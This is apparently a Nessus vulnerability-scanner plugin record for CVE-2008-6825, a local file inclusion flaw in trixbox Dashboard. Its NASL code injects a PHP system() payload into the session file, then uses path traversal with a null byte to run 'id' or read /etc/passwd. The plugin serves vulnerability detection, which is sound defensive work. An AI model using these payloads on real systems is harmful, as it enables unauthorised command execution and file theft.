"2008-07-09T00:00:00", "title": "trixbox Dashboard user/index.php langChoice Parameter Local File Inclusion", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-6825"], "modified": "2008-07-09T00:00:00", "cpe": ["cpe:/a:fonality:trixbox"], "id": "TRIXBOX_LANGCHOICE_FILE_INCLUDE.NASL", "href": "https://www.tenable.com/plugins/nessus/33445", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33445);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2008-6825\");\n script_bugtraq_id(30135);\n script_xref(name:\"EDB-ID\", value:\"6026\");\n\n script_name(english:\"trixbox Dashboard user/index.php langChoice Parameter Local File Inclusion\");\n script_summary(english:\"Tries to read /etc/passwd\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP script that is susceptible to a\nlocal file include attack.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of trixbox dashboard installed on the remote host fails to\nsanitize user-supplied input to the 'langChoice' parameter of the\n'user/index.php' script before using it to include PHP code.\nRegardless of PHP's 'register_globals' setting, an unauthenticated\nattacker could leverage this issue to view arbitrary files or to\nexecute arbitrary PHP code on the remote host, subject to the\nprivileges of the web server user id.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2008/Jul/102\");\n # http://web.archive.org/web/20090525044133/http://trixbox.org/devblog/security-vulnerability-2-6-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9c891c97\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Versions 2.6.1 and prior are reportedly 
affected by the issue\nreferenced above. Consequently, refer to the vendor for patch and/or\nupgrade options.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Trixbox langChoice PHP Local File Inclusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(22);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/07/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:fonality:trixbox\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"trixbox_web_detect.nbin\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\", \"www/trixbox\");\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:80, php:TRUE);\nget_kb_item_or_exit(\"www/trixbox\");\n\ncmd = \"id\";\ncmd_pat = \"uid=[0-9]+.*gid=[0-9]+.*\";\nfile = \"/etc/passwd\";\nfile_pat = \"root:.*:0:[01]:\";\n\n# Loop through directories.\nif (thorough_tests) dirs = list_uniq(\"/user\", cgi_dirs());\nelse dirs = make_list(cgi_dirs());\n\nforeach dir (dirs)\n{\n # Determine if the script exists.\n url = dir + \"/index.php\";\n\n r = http_send_recv3(method: \"GET\", item:url, port:port, exit_on_fail:TRUE);\n\n # If it does...\n if (\n 'form name=\"langForm\"' >< r[2] &&\n 'name=\"langChoice\"' >< r[2]\n )\n {\n # Try to identify the default language.\n default_language = \"\";\n\n pat = 'option value=\"([^\"]+)\" selected=\"selected\"';\n matches = egrep(pattern:pat, string:r[2]);\n if (matches)\n {\n foreach match (split(matches))\n {\n match = chomp(match);\n item = eregmatch(pattern:pat, string:match);\n if (!isnull(item))\n {\n default_language = item[1];\n break;\n }\n }\n }\n if (!default_language) default_language = \"english\";\n\n report = \"\";\n vuln = FALSE;\n\n # Try to exploit the issue to execute a command.\n #\n # - first, inject the PHP code into the session file.\n exploit = \"<?php system('\" + cmd + \"'); ?>%00\";\n postdata = \"langChoice=\" + exploit;\n\n r = http_send_recv3(method: \"POST\", item: url, data: postdata, port: port,\n content_type: \"application/x-www-form-urlencoded\", exit_on_fail:TRUE);\n\n # - next, figure out our session id.\n cookie = get_http_cookie(name: \"PHPSESSID\");\n # - now call the session 
file.\n if (!isnull(cookie))\n {\n exploit = \"../../../../../../../../../../../../tmp/sess_\" +cookie+ \"%00\";\n postdata2 = \"langChoice=\" + exploit;\n\n r = http_send_recv3(method: \"POST\", item: url, data: postdata2, port: port, content_type: \"application/x-www-form-urlencoded\", exit_on_fail:TRUE);\n\n if (egrep(pattern:cmd_pat, string:r[2]))\n {\n if (report_verbosity)\n {\n report =\n '\\n' +\n 'Nessus was able to execute the command \"' +cmd+ '\" on the remote \\n'+\n 'host using the following URL :\\n' +\n '\\n' +\n build_url(port:port, qs:url) + '\\n'+\n '\\n'+\n 'first with the following POST data :\\n'+\n '\\n'+\n ' ' + str_replace(find:\"&\", replace:'\\n ', string:postdata) + '\\n'+\n '\\n'+\n 'and then again with the following POST data :\\n'+\n '\\n'+\n ' ' + str_replace(find:\"&\", replace:'\\n ', string:postdata2) + '\\n';\n if (report_verbosity > 1)\n {\n output = \"\";\n if (\"trixbox_Language|s:\" >< r[2])\n {\n output = strstr(r[2], \"trixbox_Language|s:\") - \"trixbox_Language|s:\";\n output = strstr(output, ':\"') - ':\"';\n output = output - strstr(output, '\\x00');\n }\n if (!output || !egrep(pattern:cmd_pat, string:output)) output = r[2];\n output = data_protection::redact_etc_passwd(output:output);\n report =\n report+\n '\\n'+\n 'This produced the following output :\\n'+\n '\\n'+\n ' ' + output;\n }\n }\n vuln = TRUE;\n }\n }\n\n # If that failed, try to retrieve a local file.\n if (!vuln)\n {\n exploit = \"../../../../../../../../../../../..\" + file + \"%00\";\n postdata3 = \"langChoice=\" + exploit;\n\n r = http_send_recv3(method: \"POST\", item: url, data: postdata3, port: port, content_type: \"application/x-www-form-urlencoded\", exit_on_fail : TRUE);\n\n # There's a problem if...\n if (\n # there's an entry for root or...\n egrep(pattern:file_pat, string:r[2]) ||\n # we get an error because magic_quotes was enabled or...\n \"(includes/language/\" + file +\"\\\\0\" >< r[2] ||\n # we get an error claiming the file doesn't exist 
or...\n \"(includes/language/\" + file >< r[2] ||\n # we get an error about open_basedir restriction.\n \"open_basedir restriction in effect. File(\" + file >< r[2]\n )\n {\n if (report_verbosity && egrep(pattern:file_pat, string:r[2]))\n {\n output = \"\";\n if (\"<!DOCTYPE\" >< r[2]) output = r[2] - strstr(r[2], \"<!DOCTYPE\");\n if (!egrep(pattern:file_pat, string:output)) output = r[2];\n\n report =\n '\\n' +\n 'Here are the (repeated) contents of the file \"' + file + '\" that\\n'+\n 'Nessus was able to read from the remote host :\\n'+\n '\\n' +\n output;\n }\n vuln = TRUE;\n }\n }\n\n # Reset the language in the 'cache/sessionsFile.txt' in case it was changed.\n postdata4 = \"langChoice=\" + default_language;\n\n r = http_send_recv3(method: \"POST\", item: url, data: postdata4, port: port, content_type: \"application/x-www-form-urlencoded\", exit_on_fail:TRUE);\n\n # Issue a report if a problem was found.\n if (vuln)\n {\n if (report) security_hole(port:port, extra:report);\n else security_hole(port);\n exit(0);\n }\n }\n}\nif (!vuln)\n audit(AUDIT_WEB_APP_NOT_AFFECTED, \"trixbox\", build_url(qs:'/', port:port));\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}